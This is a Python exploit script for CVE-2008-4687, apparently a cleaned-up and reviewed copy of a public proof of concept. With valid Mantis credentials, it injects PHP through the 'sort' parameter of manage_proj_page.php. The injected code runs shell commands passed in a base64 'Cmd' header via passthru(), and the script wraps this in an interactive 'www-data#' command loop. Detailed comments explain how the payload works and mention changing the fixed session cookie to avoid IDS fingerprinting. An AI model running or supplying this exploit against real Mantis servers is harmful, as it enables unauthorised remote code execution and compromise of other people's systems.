# Quick and dirty exploit for CVE-2008-4687.
# Description by NIST:
# manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to
# execute arbitrary code via a sort parameter containing PHP sequences, which are
# processed by create_function within the multi_sort function in core/utility_api.php.
# (Authenticated: valid Mantis credentials are required.)
# Author: Nelson Murilo
# Date: 2020/02/15
import requests
import hashlib
import base64
import sys
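# NOTE(review): the published copy of this script lost its indentation and
# every ``[...]`` subscript (``sys.argv1``, ``r.cookies'ISSUES_STRING_COOKIE'``,
# ``$_SERVERHTTP_CMD``, ``partition('_code_')2``).  Those are restored here and
# the flat script is split into small functions; the dead ``r.headers`` block
# followed by a bare dict literal (a no-op in the original) is dropped.

USAGE = "Usage: pymantis host path user pass"

# just a little joke
UA = 'Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US'

# Fixed PHPSESSID (md5 of "xploit") sent on every request.  A constant session
# id is a trivial IDS/log fingerprint; change it if that matters to you.
SESSION_COOKIE = 'PHPSESSID=' + hashlib.md5('xploit'.encode()).hexdigest()

# Marker the payload prints right before the command output so the output can
# be cut out of the surrounding HTML.
OUTPUT_MARKER = '_code_'

# PHP injected through the ``sort`` parameter of manage_proj_page.php.  It
# closes the quoted key and the function body that multi_sort() hands to
# create_function(), silences notices, prints the marker, runs the base64
# command carried in the ``Cmd`` request header through passthru(), and
# comments out the remainder of the generated code with ``#`` (``%23``).
# ``$_SERVER[HTTP_CMD]`` uses an unquoted index on purpose (no quotes to
# escape inside the injection); PHP < 8 treats the bare name as the string
# "HTTP_CMD" -- the notice it raises is already suppressed.
PAYLOAD = (
    "');}error_reporting(0);print(" + OUTPUT_MARKER + ");"
    "passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23"
)


def parse_args(argv: list[str]) -> tuple[str, str, str, str]:
    """Return ``(host, path, user, password)`` taken from *argv*.

    Prints the usage line and exits with status -1 (as the original did) when
    the argument count is wrong.  *path* is the web path of the Mantis
    install; the script names are appended to it directly, so a missing
    trailing slash is added.
    """
    if len(argv) != 5:
        print(USAGE)
        sys.exit(-1)
    host, path, user, pwd = argv[1:5]
    if not path.endswith('/'):
        path += '/'
    return host, path, user, pwd


def base_headers(host: str, cookie: str) -> dict[str, str]:
    """Headers sent with every request: Host, the joke User-Agent, the
    explicit Cookie string and ``Connection: close``."""
    return {
        'Host': host,
        'User-Agent': UA,
        'Cookie': cookie,
        'Connection': 'close',
    }


def login(session, urlbase: str, path: str, host: str, user: str, pwd: str):
    """Authenticate against Mantis and return the Cookie string for the shell.

    Fetches ``login_page.php``, posts the credentials to ``login.php`` and --
    exactly like the original -- treats the presence of ``ISSUES_STRING_COOKIE``
    in the session's cookie jar as success.  Returns ``None`` when that cookie
    was not set (bad credentials, wrong path, or a target that names its
    cookie differently -- not verified here).
    """
    session.get(urlbase + path + 'login_page.php')
    creds = {'username': user, 'password': pwd}
    session.post(urlbase + path + 'login.php', data=creds,
                 headers=base_headers(host, SESSION_COOKIE))
    issues_cookie = session.cookies.get('ISSUES_STRING_COOKIE')
    if issues_cookie is None:
        return None
    return SESSION_COOKIE + "; ISSUES_STRING_COOKIE=" + issues_cookie


def extract_output(body: str) -> list[str]:
    """Return the lines of command output that follow OUTPUT_MARKER in *body*.

    The injected PHP runs after Mantis has started rendering the page, so the
    response is ordinary HTML up to the first marker and raw passthru() output
    after it.  Returns an empty list when the marker is absent.  Uses the
    first occurrence, as the original did; if the target echoes the ``sort``
    value into the HTML before the payload runs, that assumption breaks.
    """
    return body.partition(OUTPUT_MARKER)[2].splitlines()


def shell(urlbase: str, path: str, host: str, cookies: str) -> None:
    """Interactive command loop ("poor man's reverse shell").

    Each command is base64-encoded into the ``Cmd`` request header and the
    payload URL is fetched with the authenticated Cookie string; the page is
    then searched for the output marker.  ``exit``, EOF or Ctrl-C end the loop.
    """
    url = urlbase + path + 'manage_proj_page.php?sort=' + PAYLOAD
    while True:
        try:
            cmd = input("www-data# ")
        except (EOFError, KeyboardInterrupt):
            print()
            break
        if not cmd:
            continue
        if cmd.lower() == 'exit':
            break
        headers = base_headers(host, cookies)
        headers['Cmd'] = base64.b64encode(cmd.encode('utf-8')).decode('utf-8')
        # Plain requests.get, as in the original: the exploit sends the Cookie
        # string assembled at login verbatim rather than a Session's jar.
        resp = requests.get(url, headers=headers)
        if OUTPUT_MARKER not in resp.text:
            print("[!] no output marker in response; the injection may not have run")
            continue
        for line in extract_output(resp.text):
            print(line)
    print("Bye")


def main() -> None:
    """Entry point: log in, then drop into the command loop."""
    host, path, user, pwd = parse_args(sys.argv)
    # Plain HTTP, as in the original: credentials and every command cross the
    # wire in cleartext.
    urlbase = "http://" + host
    session = requests.Session()
    cookies = login(session, urlbase, path, host, user, pwd)
    if cookies is None:
        print("Ops! Exploit fail - Bye")
        sys.exit(1)  # non-zero so scripted use can tell failure from success
    print("** Exploit works like a charm!")
    shell(urlbase, path, host, cookies)


if __name__ == "__main__":
    main()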
